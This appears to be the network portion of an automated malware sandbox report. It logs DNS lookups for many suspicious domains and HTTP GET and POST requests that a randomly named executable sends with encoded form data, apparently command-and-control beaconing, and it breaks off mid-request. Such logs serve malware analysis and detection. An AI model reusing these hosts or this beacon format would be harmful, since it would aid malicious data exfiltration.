                                                              Sep 25, 2024 09:18:39.725292921 CEST192.168.2.81.1.1.10x5847Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:53.618664026 CEST192.168.2.81.1.1.10xec22Standard query (0)www.timetime.storeA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:19:07.071240902 CEST192.168.2.81.1.1.10x10d0Standard query (0)www.agilizeimob.appA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:19:23.395802021 CEST192.168.2.81.1.1.10xb214Standard query (0)www.asstl.onlineA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Sep 25, 2024 09:15:54.003417969 CEST1.1.1.1192.168.2.80xee9cName error (3)www.asstl.onlinenonenoneA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:15:59.157401085 CEST1.1.1.1192.168.2.80x92e1No error (0)www.cc101.pro188.114.96.3A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:15:59.157401085 CEST1.1.1.1192.168.2.80x92e1No error (0)www.cc101.pro188.114.97.3A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:16.299449921 CEST1.1.1.1192.168.2.80x2537No error (0)www.popin.space94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:16:16.299449921 CEST1.1.1.1192.168.2.80x2537No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:29.717833996 CEST1.1.1.1192.168.2.80x1f52No error (0)www.suarahati20.xyzsuarahati20.xyzCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:16:29.717833996 CEST1.1.1.1192.168.2.80x1f52No error (0)suarahati20.xyz198.252.106.191A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:42.959698915 CEST1.1.1.1192.168.2.80x1aefNo error (0)www.dhkatp.vipdhkatp.vipCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:16:42.959698915 CEST1.1.1.1192.168.2.80x1aefNo error (0)dhkatp.vip3.33.130.190A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:42.959698915 CEST1.1.1.1192.168.2.80x1aefNo error (0)dhkatp.vip15.197.148.33A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:16:56.209415913 CEST1.1.1.1192.168.2.80xa414No error (0)www.eslameldaramlly.siteeslameldaramlly.siteCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:16:56.209415913 CEST1.1.1.1192.168.2.80xa414No error (0)eslameldaramlly.site148.251.114.233A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:09.679593086 CEST1.1.1.1192.168.2.80x4ec1No error (0)www.pofgof.pro209.74.95.29A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:23.006124020 CEST1.1.1.1192.168.2.80x7b80No error (0)www.donante-de-ovulos.biz199.59.243.227A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:36.189692020 CEST1.1.1.1192.168.2.80x901bNo error (0)www.airtech365.netairtech365.netCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:17:36.189692020 CEST1.1.1.1192.168.2.80x901bNo error (0)airtech365.net3.33.130.190A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:36.189692020 CEST1.1.1.1192.168.2.80x901bNo error (0)airtech365.net15.197.148.33A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:49.330636978 CEST1.1.1.1192.168.2.80xe2b4Name error (3)www.bonusgame2024.onlinenonenoneA (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:17:57.641521931 CEST1.1.1.1192.168.2.80xfc8eNo error (0)www.longfilsalphonse.net52.223.13.41A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:11.402368069 CEST1.1.1.1192.168.2.80x950cNo error (0)www.yu35n.topyu35n.topCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:18:11.402368069 CEST1.1.1.1192.168.2.80x950cNo error (0)yu35n.top38.47.232.144A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.970890045 CEST1.1.1.1192.168.2.80x90a8No error (0)www.52ywq.vip2rqff6.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.970890045 CEST1.1.1.1192.168.2.80x90a8No error (0)2rqff6.zxy-cname.comxzwp.g.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.970890045 CEST1.1.1.1192.168.2.80x90a8No error (0)xzwp.g.zxy-cname.com52.230.28.86A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.970890045 CEST1.1.1.1192.168.2.80x90a8No error (0)xzwp.g.zxy-cname.com52.187.43.40A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.970890045 CEST1.1.1.1192.168.2.80x90a8No error (0)xzwp.g.zxy-cname.com52.187.43.73A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.970890045 CEST1.1.1.1192.168.2.80x90a8No error (0)xzwp.g.zxy-cname.com13.76.139.81A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.970890045 CEST1.1.1.1192.168.2.80x90a8No error (0)xzwp.g.zxy-cname.com13.76.137.44A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:24.970890045 CEST1.1.1.1192.168.2.80x90a8No error (0)xzwp.g.zxy-cname.com52.187.42.58A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:40.050841093 CEST1.1.1.1192.168.2.80x5847No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:18:40.050841093 CEST1.1.1.1192.168.2.80x5847No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:40.050873995 CEST1.1.1.1192.168.2.80x5847No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:18:40.050873995 CEST1.1.1.1192.168.2.80x5847No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:18:53.875441074 CEST1.1.1.1192.168.2.80xec22No error (0)www.timetime.store52.223.13.41A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:19:07.140765905 CEST1.1.1.1192.168.2.80x10d0No error (0)www.agilizeimob.appagilizeimob.appCNAME (Canonical name)IN (0x0001)false
                                                              Sep 25, 2024 09:19:07.140765905 CEST1.1.1.1192.168.2.80x10d0No error (0)agilizeimob.app84.32.84.32A (IP address)IN (0x0001)false
                                                              Sep 25, 2024 09:19:23.405035019 CEST1.1.1.1192.168.2.80xb214Name error (3)www.asstl.onlinenonenoneA (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.cc101.pro
                                                              • www.popin.space
                                                              • www.suarahati20.xyz
                                                              • www.dhkatp.vip
                                                              • www.eslameldaramlly.site
                                                              • www.pofgof.pro
                                                              • www.donante-de-ovulos.biz
                                                              • www.airtech365.net
                                                              • www.longfilsalphonse.net
                                                              • www.yu35n.top
                                                              • www.52ywq.vip
                                                              • www.komart.shop
                                                              • www.timetime.store
                                                              • www.agilizeimob.app

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.849712188.114.96.3806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:15:59.182904005 CEST469OUTGET /ttiz/?Ux_TPFo=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.cc101.pro
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:16:01.205826044 CEST1236INHTTP/1.1 200 OK
                                                              Date: Wed, 25 Sep 2024 07:16:01 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Wed, 18 Sep 2024 08:27:45 GMT
                                                              Vary: Accept-Encoding
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwFP%2BLQrdQN0vhDHw%2BtKY43Cb6LxNDyYt36ZqjbBWyGErEiIJ0ysU9sqFn2idHmiEMB%2Fg%2B%2FSGwjaPPCwW%2BZqXGfM2xZVCmTaj30i%2B9Pr3SJGzSADmaAQ%2BA3kG1ONhrLt"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c8939e95ffd8ca5-EWR
                                                              Data Raw: 65 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 36 65 61 65 62 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 20 32 30 30 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 35 70 78 20 31 35 70 78 20 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 [TRUNCATED]
                                                              Data Ascii: e6e<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;background:#fff;border-radius:50%;"></canvas><div style="color: #2
                                                              Sep 25, 2024 09:16:01.205859900 CEST224INData Raw: 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 31 31 70 78 20 20 30 20 32 30 70 78 22 3e e9 80 9a e8 bf 87 e5 ae 89 e5 85 a8 e5 8a a0 e5 af 86 e6 a3 80 e6 b5 8b 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 73
                                                              Data Ascii: 42424;font-size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20449;&#35465;&#20445;&#35777;</div><a id="btn" h
                                                              Sep 25, 2024 09:16:01.205873013 CEST1236INData Raw: 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 3b 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f
                                                              Data Ascii: ref="javascript:void(0);" style="display: block;border-radius: 500px;background-color: #ff5656;height: 65px;line-height: 65px;width: 250px;color: #fff;font-size: 22px;text-decoration: none;letter-spacing: 2px;margin:20px auto;cursor:pointer;">
                                                              Sep 25, 2024 09:16:01.205887079 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 53 74 79 6c 65 20 3d 20 22 23 30 30 61 32 66 66 20 22 3b 0a 20 20 20
                                                              Data Ascii: ctx.stroke(); ctx.strokeStyle = "#00a2ff "; ctx.lineWidth = ras * 0.12; ctx.beginPath(); ctx.arc(0, 0, ras * 0.8, -Math.PI / 2, -Math.PI / 2 + index
                                                              Sep 25, 2024 09:16:01.205904961 CEST376INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 64 72 61 77 46 72 61 6d 65 2c 20 32 30 29 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: } setTimeout(drawFrame, 20) } else if (index != 100) { index = 100; drawFrame() } else {


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.849714199.59.243.227806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:16.317819118 CEST722OUTPOST /x7gz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.popin.space
                                                              Origin: http://www.popin.space
                                                              Referer: http://www.popin.space/x7gz/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 74 79 50 63 32 30 6f 6c 39 4c 68 52 2f 58 30 30 66 46 6d 38 42 67 7a 36 56 57 61 7a 7a 69 2b 4a 6f 63 41 59 4e 76 79 73 77 4e 4e 67 74 34 67 77 44 79 52 5a 4c 6c 76 67 37 33 70 35 38 6b 6a 75 63 68 57 6a 63 49 35 58 61 41 72 55 44 59 77 74 42 58 31 6d 45 63 42 78 4e 53 59 6c 33 79 36 66 68 4a 68 63 78 6e 7a 66 5a 72 62 31 6f 5a 44 30 51 50 50 62 48 4b 34 49 51 48 59 46 78 63 39 47 6d 32 71 44 6b 45 30 33 52 71 48 57 36 6e 4f 61 44 51 43 72 68 75 52 58 68 78 6b 74 44 54 67 77 48 77 39 6d 77 37 43 30 4b 34 6f 4d 4b 73 72 47 62 76 71 59 79 69 62 37 65 58 77 3d
                                                              Data Ascii: Ux_TPFo=f07BeQ/6F/4ytyPc20ol9LhR/X00fFm8Bgz6VWazzi+JocAYNvyswNNgt4gwDyRZLlvg73p58kjuchWjcI5XaArUDYwtBX1mEcBxNSYl3y6fhJhcxnzfZrb1oZD0QPPbHK4IQHYFxc9Gm2qDkE03RqHW6nOaDQCrhuRXhxktDTgwHw9mw7C0K4oMKsrGbvqYyib7eXw=
                                                              Sep 25, 2024 09:16:16.779545069 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:16:16 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1110
                                                              x-request-id: dc9d5113-cb0f-47cf-a004-375787d10402
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                              set-cookie: parking_session=dc9d5113-cb0f-47cf-a004-375787d10402; expires=Wed, 25 Sep 2024 07:31:16 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6e 6b 45 65 79 57 74 59 38 67 67 59 56 72 30 4c 50 61 34 6f 77 74 32 67 61 61 38 55 36 32 69 76 62 7a 45 59 35 4f 31 4b 4d 39 63 32 2f 32 39 49 57 33 57 50 57 53 4f 42 36 42 49 76 36 4a 74 6d 6f 39 63 65 36 75 66 77 2b 46 50 62 67 2f 2f 74 48 6c 6d 48 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:16:16.779567003 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGM5ZDUxMTMtY2IwZi00N2NmLWEwMDQtMzc1Nzg3ZDEwNDAyIiwicGFnZV90aW1lIjoxNzI3MjQ4NT


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.849715199.59.243.227806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:18.870013952 CEST742OUTPOST /x7gz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.popin.space
                                                              Origin: http://www.popin.space
                                                              Referer: http://www.popin.space/x7gz/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 73 54 2f 63 30 56 6f 6c 37 72 68 53 6a 48 30 30 56 6c 6d 34 42 6e 37 36 56 54 36 6a 7a 52 61 4a 72 34 49 59 4d 71 47 73 7a 4e 4e 67 2f 59 67 2f 4e 53 52 43 4c 6c 7a 65 37 31 39 35 38 67 4c 75 63 6a 65 6a 63 66 6c 55 61 51 72 53 49 34 77 76 4f 33 31 6d 45 63 42 78 4e 53 63 4c 33 7a 53 66 68 35 78 63 78 44 66 63 43 4c 62 32 74 70 44 30 64 76 50 66 48 4b 34 36 51 47 31 53 78 66 46 47 6d 33 61 44 6b 78 41 30 4b 36 48 51 33 48 4f 49 53 44 72 76 68 70 64 43 72 33 73 50 49 6c 34 32 4c 6d 51 4d 71 5a 4b 79 4a 34 41 6e 4b 76 44 77 65 59 33 77 6f 42 4c 4c 41 41 6e 53 42 53 66 35 6b 62 6d 30 6a 4c 4e 30 69 70 55 66 4b 59 58 4d
                                                              Data Ascii: Ux_TPFo=f07BeQ/6F/4ysT/c0Vol7rhSjH00Vlm4Bn76VT6jzRaJr4IYMqGszNNg/Yg/NSRCLlze71958gLucjejcflUaQrSI4wvO31mEcBxNScL3zSfh5xcxDfcCLb2tpD0dvPfHK46QG1SxfFGm3aDkxA0K6HQ3HOISDrvhpdCr3sPIl42LmQMqZKyJ4AnKvDweY3woBLLAAnSBSf5kbm0jLN0ipUfKYXM
                                                              Sep 25, 2024 09:16:19.313280106 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:16:18 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1110
                                                              x-request-id: f34ca90e-a0ff-4f2a-8799-be873239d623
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                              set-cookie: parking_session=f34ca90e-a0ff-4f2a-8799-be873239d623; expires=Wed, 25 Sep 2024 07:31:19 GMT; path=/
                                                              connection: close
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6e 6b 45 65 79 57 74 59 38 67 67 59 56 72 30 4c 50 61 34 6f 77 74 32 67 61 61 38 55 36 32 69 76 62 7a 45 59 35 4f 31 4b 4d 39 63 32 2f 32 39 49 57 33 57 50 57 53 4f 42 36 42 49 76 36 4a 74 6d 6f 39 63 65 36 75 66 77 2b 46 50 62 67 2f 2f 74 48 6c 6d 48 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:16:19.313298941 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjM0Y2E5MGUtYTBmZi00ZjJhLTg3OTktYmU4NzMyMzlkNjIzIiwicGFnZV90aW1lIjoxNzI3MjQ4NT


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.849716199.59.243.227806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:21.419265032 CEST1759OUTPOST /x7gz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.popin.space
                                                              Origin: http://www.popin.space
                                                              Referer: http://www.popin.space/x7gz/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
